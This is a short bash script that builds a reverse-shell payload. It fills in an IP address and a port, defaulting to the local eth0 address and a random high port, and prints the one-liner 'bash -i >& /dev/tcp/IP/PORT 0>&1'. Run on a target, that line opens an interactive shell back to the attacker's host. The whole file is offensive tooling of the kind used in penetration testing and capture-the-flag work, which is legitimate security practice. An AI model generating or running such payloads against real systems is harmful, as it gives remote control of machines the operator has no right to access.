#!/bin/bash
if [[ $1 ]]; then
        IP=$1
else
        IP=$(echo $(ifconfig eth0 | grep -oP "inet \K\S+"))
fi
if [[ $2 ]]; then
        PORT=$2
else
        PORT=$((32000 + RANDOM % 30000))
fi
echo "bash -i >& /dev/tcp/$IP/$PORT 0>&1"
